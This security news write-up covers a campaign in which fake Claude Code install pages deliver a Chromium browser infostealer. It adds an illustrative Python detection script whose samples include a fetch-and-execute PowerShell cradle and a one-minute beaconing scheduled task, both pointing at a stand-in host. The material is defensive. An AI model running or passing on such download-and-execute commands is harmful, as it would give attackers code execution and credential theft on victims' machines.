
Introduction
A newly documented malware campaign is using fake Claude Code installation pages to distribute a previously undocumented information stealer aimed at Chromium-based browsers. The operation targets developers, using malicious sponsored search results to steer them to a lookalike page whose install command fetches a tampered installer. Once executed, the malware bypasses Chromium's App-Bound Encryption, extracts cookies, passwords and payment data, and exfiltrates them to attacker-controlled infrastructure. Researchers have tied the operation to a cluster of recently registered domains and a PowerShell-based attack chain engineered to evade conventional detection.
Summary of the Original Report
A newly identified information stealer is being distributed through fraudulent Claude Code installation websites built to resemble the official documentation. Victims typically arrive through sponsored search ads shown for queries such as “install Claude Code.” The pages reproduce the official layout almost exactly but replace the legitimate one-line install command with one that pulls its script from attacker-controlled infrastructure instead.
Ontinue’s Cyber Defense Center found the campaign backed by at least three domains registered within a six-day window in April 2026. Each hosts an installer script at “/install.ps1” that looks benign when fetched and scanned in isolation but behaves maliciously when run through the install command embedded on the fake page.
Once the victim runs the command, a heavily obfuscated PowerShell loader of roughly 600 KB is downloaded and executed. The loader enumerates installed Chromium-based browsers, including Google Chrome, Microsoft Edge, Brave Browser, Vivaldi, Arc Browser and niche ones such as Perplexity Comet, and injects a small native helper into running browser processes.
The helper targets the IElevator2 COM interface introduced in Chrome 144 to obtain the browser’s App-Bound Encryption keys, which protect stored cookies, passwords and payment data. Similar techniques appeared in earlier malware families, but this variant is tuned for stealth and modular execution: the helper performs no direct system-level operations of its own, so most detectable activity shows up in the PowerShell layer rather than in the injected binary.
The loader also installs persistence through scheduled tasks that contact command-and-control servers every minute, and it contains geographic exclusion logic that prevents execution in certain CIS countries, indicating a deliberately scoped operation.
One implementation flaw stands out for defenders: a malformed identifier in the Edge IElevator2 call triggers fallback behavior that can be used as a detection signal. The analysts stress that developers are the primary target, since their machines typically hold privileged access to source code, cloud infrastructure and CI/CD pipelines.
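Two of the behaviours described above lend themselves to simple checks: the swapped install command on the lookalike page (a download cradle that pipes a remote script into Invoke-Expression from a host other than the expected one) and the scheduled task that runs PowerShell on a one-minute repetition. The following is an added example, not code from Ontinue or from this article; the allowlisted host, the domain names, the task names and the task XML are constructed for illustration and are not indicators from the report.

```python
"""Added example (not Ontinue's or Undercode's code). Two detection heuristics
taken from the campaign description: download cradles pointing at unexpected
hosts, and scheduled tasks that run PowerShell on a tight repetition interval.
All hosts, task names and XML below are constructed for illustration."""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Assumption: the host the legitimate install command fetches from. Adjust to
# whatever your organisation has verified; it is an allowlist, not an indicator.
ALLOWED_INSTALL_HOSTS = {"claude.ai"}

# A "download cradle": fetch a URL with irm/iwr and pipe the body into iex.
CRADLE_RE = re.compile(
    r"\b(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b"   # fetch cmdlet or alias
    r"(?:\s+-\w+)*"                                          # optional switches
    r"\s+['\"]?(https?://[^\s'\"|)]+)['\"]?"                  # the URL being fetched
    r"[^|\n]*\|\s*(?:iex|Invoke-Expression)\b",              # piped into Invoke-Expression
    re.IGNORECASE,
)


def find_download_cradles(text):
    """Return (url, host) for every download cradle in a page, script or log line."""
    found = []
    for m in CRADLE_RE.finditer(text):
        url = m.group(1)
        host = (urlparse(url).hostname or "").lower()
        found.append((url, host))
    return found


def unexpected_cradle_hosts(text, allowed=ALLOWED_INSTALL_HOSTS):
    """Cradle hosts that are not allowlisted. A lookalike page keeps the shape
    of the official one-liner and changes only this part."""
    return sorted({host for _, host in find_download_cradles(text) if host not in allowed})


TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}


def iso_duration_seconds(value):
    """Parse the ISO 8601 duration subset Task Scheduler emits (PT1M, P1DT2H, ...)."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", value or "")
    if not m:
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 86400 + h * 3600 + mi * 60 + s


def beaconing_powershell_tasks(task_xml, max_interval=60):
    """Given a task definition (e.g. the XML carried in a 4698 'task created'
    event), flag Exec actions that run PowerShell with a repetition interval of
    max_interval seconds or less. Returns (command, interval, cradle_hosts)."""
    root = ET.fromstring(task_xml)
    intervals = [iso_duration_seconds(e.text)
                 for e in root.iterfind(".//t:Repetition/t:Interval", TASK_NS)]
    tight = [i for i in intervals if i is not None and i <= max_interval]
    if not tight:
        return []
    findings = []
    for exe in root.iterfind(".//t:Actions/t:Exec", TASK_NS):
        cmd = exe.findtext("t:Command", default="", namespaces=TASK_NS)
        args = exe.findtext("t:Arguments", default="", namespaces=TASK_NS)
        if re.search(r"(?:^|\\)(?:powershell|pwsh)(?:\.exe)?$", cmd.strip().strip('"'), re.IGNORECASE):
            findings.append((cmd, min(tight), [h for _, h in find_download_cradles(args)]))
    return findings


# Constructed samples: an install line as a lookalike page might show it, and the
# legitimate shape of the same command.
FAKE_PAGE_COMMAND = "irm https://claude-code-install.example/install.ps1 | iex"
REAL_PAGE_COMMAND = "irm https://claude.ai/install.ps1 | iex"

# Constructed task XML (the XML declaration that a real 4698 event carries is omitted).
BEACON_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><Repetition><Interval>PT1M</Interval></Repetition>
    <StartBoundary>2026-04-20T09:00:00</StartBoundary><Enabled>true</Enabled></TimeTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe</Command>
    <Arguments>-w hidden -nop -c "irm https://claude-code-install.example/beacon | iex"</Arguments>
  </Exec></Actions>
</Task>"""

BENIGN_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><Repetition><Interval>PT1H</Interval></Repetition>
    <StartBoundary>2026-04-20T09:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-File C:\\Scripts\\rotate-logs.ps1</Arguments>
  </Exec></Actions>
</Task>"""

if __name__ == "__main__":
    print("fake page cradle hosts:", unexpected_cradle_hosts(FAKE_PAGE_COMMAND))
    print("real page cradle hosts:", unexpected_cradle_hosts(REAL_PAGE_COMMAND))
    print("beaconing tasks:", beaconing_powershell_tasks(BEACON_TASK_XML))
    print("benign task:", beaconing_powershell_tasks(BENIGN_TASK_XML))
```

The cradle check is only as good as the allowlist, and a cloaked `/install.ps1` will look clean to a scanner that fetches it without the exact headers the page's command sends, so treat the host mismatch, not the script's content, as the signal. The task heuristic keys on the repetition interval plus the PowerShell command line; an hourly maintenance script runs through the same code path and is not flagged.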
What Undercode Says:
The campaign represents a clear evolution in browser-targeted information theft.
Attackers are no longer relying on simple credential stealers.
Instead, they are building multi-stage injection chains that exploit browser architecture directly.
The use of fake Claude Code installation pages shows strong social engineering alignment with developer workflows.
Sponsored search poisoning is becoming a preferred entry vector for high-value targets.
This reflects a shift from random phishing to precision targeting of technical users.
The PowerShell-first execution model is designed to bypass endpoint detection logic.
By keeping native code minimal, the malware avoids many behavioral sandbox triggers.
The reliance on IElevator2 shows attackers are tracking Chromium security updates closely.
The interface arrived in Chrome 144, and attackers weaponized it quickly.
The separation between loader and helper reduces forensic visibility.
Most malicious activity appears in script telemetry rather than binary execution logs.
This is a deliberate attempt to fragment detection surfaces across layers.
The approach mirrors the script-based living-off-the-land techniques seen in advanced persistent threats.
Developer machines are being treated as strategic entry points into enterprise systems.
Once a developer is compromised, lateral movement becomes significantly easier.
Access to Git repositories can expose proprietary algorithms and secrets.
Cloud credentials stored in browsers become immediate exfiltration targets.
The malware’s scheduled task persistence indicates long-term surveillance intent.
Geo-fencing logic suggests attackers are avoiding attribution-heavy regions.
This is consistent with organized threat actor behavior rather than opportunistic crimeware.
The malformed identifier bug is a rare operational weakness that defenders can leverage.
It may become a reliable signature for detection pipelines.
Ontinue’s analysis highlights how quickly browser security boundaries are being challenged.
The evolution of App-Bound Encryption bypass techniques is accelerating.
This campaign demonstrates that browser trust models are now actively being reverse engineered.
Security teams must assume browser memory is a hostile execution environment.
Traditional endpoint tools are insufficient without script-level visibility.
The attack chain is optimized for stealth, persistence, and credential harvesting at scale.
Developer-focused targeting increases the blast radius of a single infection.
Supply chain compromise risk increases when CI/CD environments are exposed.
The campaign reflects a broader industry trend toward infrastructure-aware malware design.
Fact Checker Results
✔ The campaign uses fake installation pages to deliver malware
✔ PowerShell-based loaders are used to execute the attack chain
✔ Chromium-based browsers are explicitly targeted for credential extraction
Prediction
This type of browser-native attack is likely to increase as Chromium evolves its encryption and sandboxing mechanisms. Future variants will probably reduce PowerShell visibility even further by shifting more logic into in-memory execution. Developer-focused phishing will continue to rise, especially through sponsored search manipulation. We may also see integration with AI-generated lures that dynamically adapt fake documentation pages in real time, making detection significantly harder for both users and traditional security tools.
References:
Reported By: www.infosecurity-magazine.com